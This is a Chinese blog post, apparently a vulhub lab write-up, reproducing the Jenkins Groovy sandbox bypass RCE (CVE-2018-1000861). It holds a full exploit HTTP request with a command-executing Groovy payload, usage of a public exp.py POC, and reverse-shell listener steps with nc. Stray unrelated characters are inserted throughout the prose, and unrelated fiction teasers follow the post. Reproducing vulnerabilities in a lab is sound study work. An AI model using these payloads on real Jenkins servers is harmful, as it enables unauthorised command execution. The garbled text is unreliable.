CVE-2018-1000861復現(xiàn)


vulhub

1. 漏洞介紹

1.1 背景介紹

Jenkins使用Stapler框架開發(fā),其允許用戶通過URL PATH來調用一次public方法伐庭。由于這個過程沒有做限制,攻擊者可以構造一些特殊的PATH來執(zhí)行一些敏感的Java方法分冈。

通過這個漏洞圾另,我們可以找到很多可供利用的利用鏈。其中最嚴重的就是繞過Groovy沙盒導致未授權用戶可執(zhí)行任意命令:Jenkins在沙盒中執(zhí)行Groovy前會先檢查腳本是否有錯誤雕沉,檢查操作是沒有沙盒的集乔,攻擊者可以通過Meta-Programming的方式,在檢查這個步驟時執(zhí)行任意命令蘑秽。

1.2 漏洞影響

Jenkins Version <= 2.56
Jenkins LTS Version <= 2.46.1

2. 漏洞詳細復現(xiàn)步驟

2.1 環(huán)境&工具

漏洞機:192.168.10.200 ubuntu

  • docker
  • vulhub

攻擊機:Windows10

  • Burpsuit
  • wireshark

2.2 漏洞復現(xiàn)步驟

2.2.1 漏洞機環(huán)境

執(zhí)行如下命令啟動一個Jenkins 2.138,包含漏洞的插件也已經安裝:

docker-compose up -d

環(huán)境啟動后箫攀,訪問http://your-ip:8080即可看到一個已經成功初始化的Jenkins肠牲,無需再進行任何操作。

2.2.2 漏洞復現(xiàn)
  1. 反彈shell

/dev/tcp是一個socket鏈接

嘗試在windows攻擊機的防火墻的高級設置中添加入站規(guī)則和出站規(guī)則靴跛,依然鏈接被拒絕缀雳。

ping攻擊機是能夠ping通的。

嘗試關掉靶機的防火墻梢睛,依然鏈接被拒絕

嘗試更換端口號肥印,依然鏈接被拒絕

明明就能ping通,我實在想不通绝葡。

解密了深碱,應當先在攻擊機監(jiān)聽端口,再在靶機tcp鏈接攻擊機藏畅,這個時候再在攻擊機回車兩次敷硅,就會出現(xiàn)反彈shell。

nc -lvp 6789 #port
  1. 使用一鍵POC腳本

使用https://github.com/orangetw/awesome-jenkins-rce-2019

下載運行 exp.py 需要的依賴

pip install requests
pip install enum

執(zhí)行exp.py

python exp.py http://靶機ip:8080/ "touch /tmp/success"

在靶機查看是否成功

  1. 使用burpsuite

現(xiàn)將playload中的value編碼url

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{%20public%20x(){%20%22touch%20/tmp/ascotbe%22.execute()%20}%20} HTTP/1.1
Host: 192.168.0.113:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: screenResolution=1920x1080; JSESSIONID.d8a9d49b=node04iwr99dggu5u1fnn3epmfu3513.node0; JSESSIONID.5ecc223b=node0179ytitxipcl01li5ix1f0ac5c0.node0
Connection: close

response一片空白愉阎。

2.3 漏洞復現(xiàn)注意事項

應當先在攻擊機監(jiān)聽端口绞蹦,再在靶機tcp鏈接攻擊機,這樣端口才能對應上榜旦!如果先tcp鏈接是會被拒絕的幽七。如果鏈接不上,應當先檢查雙方是否能ping通溅呢,再檢查IPS是否攔截成功澡屡。

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末猿挚,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子挪蹭,更是在濱河造成了極大的恐慌亭饵,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,755評論 6 507
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件梁厉,死亡現(xiàn)場離奇詭異辜羊,居然都是意外死亡,警方通過查閱死者的電腦和手機词顾,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,305評論 3 395
  • 文/潘曉璐 我一進店門八秃,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人肉盹,你說我怎么就攤上這事昔驱。” “怎么了上忍?”我有些...
    開封第一講書人閱讀 165,138評論 0 355
  • 文/不壞的土叔 我叫張陵骤肛,是天一觀的道長。 經常有香客問我窍蓝,道長腋颠,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,791評論 1 295
  • 正文 為了忘掉前任吓笙,我火速辦了婚禮淑玫,結果婚禮上,老公的妹妹穿的比我還像新娘面睛。我一直安慰自己絮蒿,他們只是感情好,可當我...
    茶點故事閱讀 67,794評論 6 392
  • 文/花漫 我一把揭開白布叁鉴。 她就那樣靜靜地躺著土涝,像睡著了一般。 火紅的嫁衣襯著肌膚如雪幌墓。 梳的紋絲不亂的頭發(fā)上回铛,一...
    開封第一講書人閱讀 51,631評論 1 305
  • 那天,我揣著相機與錄音克锣,去河邊找鬼。 笑死袭祟,一個胖子當著我的面吹牛验残,可吹牛的內容都是我干的。 我是一名探鬼主播巾乳,決...
    沈念sama閱讀 40,362評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼您没,長吁一口氣:“原來是場噩夢啊……” “哼鸟召!你這毒婦竟也來了?” 一聲冷哼從身側響起氨鹏,我...
    開封第一講書人閱讀 39,264評論 0 276
  • 序言:老撾萬榮一對情侶失蹤欧募,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后仆抵,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體跟继,經...
    沈念sama閱讀 45,724評論 1 315
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 37,900評論 3 336
  • 正文 我和宋清朗相戀三年镣丑,在試婚紗的時候發(fā)現(xiàn)自己被綠了舔糖。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 40,040評論 1 350
  • 序言:一個原本活蹦亂跳的男人離奇死亡莺匠,死狀恐怖金吗,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情趣竣,我是刑警寧澤摇庙,帶...
    沈念sama閱讀 35,742評論 5 346
  • 正文 年R本政府宣布,位于F島的核電站遥缕,受9級特大地震影響卫袒,放射性物質發(fā)生泄漏。R本人自食惡果不足惜通砍,卻給世界環(huán)境...
    茶點故事閱讀 41,364評論 3 330
  • 文/蒙蒙 一玛臂、第九天 我趴在偏房一處隱蔽的房頂上張望烤蜕。 院中可真熱鬧封孙,春花似錦、人聲如沸讽营。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,944評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽橱鹏。三九已至膜蠢,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間莉兰,已是汗流浹背挑围。 一陣腳步聲響...
    開封第一講書人閱讀 33,060評論 1 270
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留糖荒,地道東北人杉辙。 一個月前我還...
    沈念sama閱讀 48,247評論 3 371
  • 正文 我出身青樓,卻偏偏與公主長得像捶朵,于是被迫代替她去往敵國和親蜘矢。 傳聞我的和親對象是個殘疾皇子狂男,可洞房花燭夜當晚...
    茶點故事閱讀 44,979評論 2 355